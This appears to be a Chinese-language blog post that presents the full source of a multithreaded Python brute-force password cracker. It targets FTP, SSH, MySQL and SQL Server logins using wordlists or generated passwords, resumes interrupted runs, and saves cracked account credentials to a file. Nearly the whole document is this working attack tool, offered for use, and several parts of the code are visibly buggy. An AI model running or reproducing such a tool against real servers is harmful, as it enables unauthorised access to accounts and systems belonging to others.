支持FTP、MySQL、SSH、Sqlserver协议
功能:每次破解可以设置时间间隔,破解中断下次破解可以读取历史继续上一次的破解。支持多线程,可自行设置线程数.
上代码:
"""
python3暴力穷举密码
"""
import threading
import time
import os
from time import strftime
from itertools import product
from time import sleep
from tqdm import tqdm
import requests
from requests import post
import pymysql # 导入连接数据库的模块
import ftplib
import logging
import logging.config
from pexpect import pxssh
import optparse
import pymysql
import httpauth
import MySQLdb
PATHSAVE = ""
# *密码生成器
def psgens_auto(x=8): # x为密码的位数
iter = ['8921345670',
'abcdefghijklmnopqrstuvwxyz',
'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
]
for r in iter:
for repeat in range(x, x + 1):
for ps in product(r, repeat=repeat):
yield ''.join(ps)
def users_auto(x=4):
iter = [
'abcdefghijklmnopqrstuvwxyz',
'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
'8921345670',
]
for r in iter:
for repeat in range(x, x + 1):
for ps in product(r, repeat=repeat):
yield ''.join(ps)
def data_save(type, user, passwd):
fileSave = open(PATHSAVE, 'a')
timeDate = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = '时间:%s 破解成功的 协议:%s 帐号:%s 密码:%s \n' % (timeDate, type, user, passwd)
fileSave.write(data)
print('己成功存入文件:{0}'.format(data))
fileSave.close()
def connect_ftp(user, passwd, target_ip):
try:
ftpconn = ftplib.FTP(target_ip, timeout=2)
ftpconn.login(user, passwd)
except Exception as e:
print("破解失败 帐号:{0} 密码:{1}".format(user, passwd))
else:
print("****************破解成功*******************\n")
print("帐号:{0} 密码:{1}".format(user, passwd))
data_save("FTP", user, passwd)
def connect_ssh(user, passwd, target_ip):
try:
pass
s = pxssh.pxssh()
s.login(target_ip, user, passwd)
except Exception as e:
print("破解失败 帐号:{0} 密码:{1}".format(user, passwd))
else:
print("****************破解成功*******************\n")
print("帐号:{0} 密码:{1}".format(user, passwd))
ftplib.quit()
data_save(user, passwd)
def connect_mysql(user, passwd, target_ip, db):
try:
conn = MySQLdb.connect( # 连接数据库
host=target_ip, # addr
user=user, # 用户名
passwd=passwd, # 数据库密码
db=db, # 数据库名
charset='utf8')
except Exception as e:
print("破解失败: 帐号:{0} 密码:{1}".format(user, passwd))
else:
print("****************破解成功*******************")
print("破解成功: 帐号:{0} 密码:{1}".format(user, passwd))
conn.close()
data_save("mysql", user, passwd)
def connect_sqlserver(user, passwd, serverName, db):
try:
connect = pymysql.connect(serverName, user, passwd, db)
except Exception as e:
print("破解失败 帐号:{0} 密码:{1}".format(user, passwd))
else:
print("****************破解成功*******************")
print("帐号:{0} 密码:{1}".format(user, passwd))
data_save(user, passwd)
def Thread_funtion(user, passwd, target_ip, select, optionA, optionB):
if select == 1:
connect_ftp(user, passwd, target_ip)
elif select == 2:
connect_ssh(user, passwd, target_ip)
elif select == 3:
db = optionA
connect_mysql(user, passwd, target_ip, db)
elif select == 4:
db = optionA
serverName = optionB
connect_sqlserver(user, passwd, serverName, db)
def main():
global PATHSAVE
threads = [] # 线程列表
threadsNum = 1
timeInterval = 0
flag = True
target_ip = 'localhost' # 127.0.0.1
option = ""
records = 'Y'
flagRecord = 1
sum = 0
while (flag):
print(">>>**************************************")
print(">>>* 请选择暴力破解方式 *")
print(">>>* 1.字典破解(推荐) *")
print(">>>* 2.自动生成器 *")
print(">>>**************************************")
selecttp = int(input(">>>请选择功能:"))
while (flag):
print(">>>**************************************")
print(">>>* 参数设置 *")
print(">>>* 1.线程数量(默认为1) *")
print(">>>* 2.每次破解间隔时间(默认为0s) *")
print(">>>* 3.目标机地址(默认为本机) *")
print(">>>* 4.历史破解记录(默认读档继续) *")
print(">>>* 0.参数设置完成退出 *")
print(">>>* *提示:(设置后保存至程序结束) *")
print(">>>**************************************")
selectParameter = int(input(">>>请选择功能:"))
if selectParameter == 1:
threadsNum = int(input(">>>请输入线程数量:"))
elif selectParameter == 2:
timeInterval = int(input(">>>请输入破解间隔时间:"))
elif selectParameter == 3:
target_ip = int(input(">>>请输入目标机地址:"))
elif selectParameter == 4:
print(">>>**************************************")
print(">>>* 历史破解记录 *")
print(">>>* 1.从新开始 *")
print(">>>* 2.读档继续 *")
print(">>>**************************************")
selectHistorify = int(input(">>>请选择功能:"))
if selectHistorify == 1:
records = 'N'
else:
records = 'Y'
else:
flag = False
flag = True
print(">>>**************************************")
print(">>>* 请选择协议类型 *")
print(">>>* 1.FTP *")
print(">>>* 2.SSH *")
print(">>>* 3.Mysql *")
print(">>>* 4.Sqlserver *")
print(">>>* 0.退出 *")
print(">>>**************************************")
select = int(input(">>>请选择功能:"))
if select > 6:
print("选择错误,请重新选择")
continue
elif select < 0:
print("选择错误,请重新选择")
continue
if select != 0:
print("*********************开始破解******************\n")
try:
while (flag):
PATHSAVE = input(">>>请输入破解成功数据存放的文件路径:")
if os.path.exists(PATHSAVE):
flag = False
else:
print("帐户文件路径不存在请重新输入")
if select == 3:
optionA = input(">>>请指定数据库:")
elif select == 4:
optionA = input(">>>请指定数据库:")
optionB = input(">>>请指定服务器名字:")
flag = True
if selecttp == 1: # 输入字典文件路径
while (flag):
pathPasswd = input(">>>请输入密码字典文件路径:")
pathUser = input(">>>请输入帐户字典文件路径:")
if os.path.exists(pathPasswd) & os.path.exists(pathUser):
userList = Read_str(pathUser)
passwdList = Read_num(pathPasswd)
flag = False
elif os.path.exists(pathPasswd):
print("帐户字典文件路径不存在请重新输入")
elif os.path.exists(pathUser):
print("密码字典文件路径不存在请重新输入")
else:
print("帐户和密码字典文件路径都不存在请重新输入")
flag = True
elif selecttp == 2:
user_num = int(input(">>>请输入帐户位数:"))
passwd_num = int(input(">>>请输入密码位数:"))
else:
flag = False
selecttp = 0
print("选择错误,请重新选择")
if records == 'Y':
flagRecord = 0
while (flag):
pathPasswdOne = input(">>>请输入存储历史密码文件路径:")
pathUserOne = input(">>>请输入存储历史帐户文件路径:")
if os.path.exists(pathPasswdOne) & os.path.exists(pathUserOne):
fileUserHistorify = open(pathUserOne, 'r')
filePasswdHistorify = open(pathPasswdOne, 'r')
UserHistorify = fileUserHistorify.readline()
PasswdHistorify = filePasswdHistorify.readline()
if len(UserHistorify) == 0:
records == 'N'
flagRecord = 1
elif len(PasswdHistorify) == 0:
records == 'N'
flagRecord = 1
flag = False
elif os.path.exists(pathPasswd):
print("帐户文件路径不存在请重新输入")
elif os.path.exists(pathUser):
print("密码文件路径不存在请重新输入")
else:
print("帐户和密码文件路径都不存在请重新输入")
flag = True
if selecttp == 1: # 自定义字典
for user in userList:
for passwd in passwdList:
if (sum == threadsNum):
sleep(timeInterval)
sum = 0
if records == 'Y':
if user == UserHistorify:
if passwd == PasswdHistorify:
flagRecord = 1
if flagRecord == 1:
write_str(pathUserOne, pathPasswdOne, user, passwd)
thread_x = threading.Thread(target=Thread_funtion, args=(
str(user), str(passwd), target_ip, select, optionA, optionB)) # 创建新线程
threads.append(thread_x) # 添加 线程 到 线程列表
thread_x.start() # 开启新线程,开始运行threading.Thread.run方法
sum = sum + 1
else: # 自动生成器
for user in tqdm(users_auto(user_num)):
for passwd in tqdm(psgens_auto(passwd_num)):
if (sum == threadsNum):
sleep(timeInterval)
sum = 0
if user == UserHistorify:
if passwd == PasswdHistorify:
flagRecord = 1
if flagRecord == 1:
write_str(pathUserOne, pathPasswdOne, user, passwd)
thread_x = threading.Thread(target=Thread_funtion, args=(
str(user), str(passwd), target_ip, select, optionA, optionB)) # 创建新线程
threads.append(thread_x) # 添加 线程 到 线程列表
thread_x.start()
sum = sum + 1
if records == 'Y':
fileTruncate(pathPasswdOne, pathUserOne)
except Exception as e:
print("error:", e)
else:
flag = False
for t in threads: # 等待所有线程完成
t.join()
print("*********************破解结束******************\n")
def fileTruncate(pathUserOne, pathPasswdOne):
fileUser = open(pathUserOne, 'w')
filePasswd = open(pathPasswdOne, 'w')
fileUser.truncate()
filePasswd.truncate()
fileUser.close()
filePasswd.close()
def write_str(pathUserOne, pathPasswdOne, user, passwd):
fileUser = open(pathUserOne, 'w')
filePasswd = open(pathPasswdOne, 'w')
fileUser.write(user)
filePasswd.write(passwd)
fileUser.close()
filePasswd.close()
def Read_num(rootdir, flag=0):
lines = list()
with open(rootdir, 'r') as file:
txt = file.read()
if not txt:
if flag == 0:
line = Read_num(rootdir, flag=1)
else:
for line in txt.split('\n'):
if line.isdigit():
lines.extend(line.split())
flag = 1
file.close()
return lines
def Read_str(rootdir, flag=0):
lines = []
with open(rootdir, 'r') as file:
while True:
line = file.readline()
if not line:
if flag == 0:
line = Read_num(rootdir, flag=1)
break
line = line.strip('\n')
lines.append(line)
flag = 1
file.close()
return lines
if __name__ == "__main__":
main()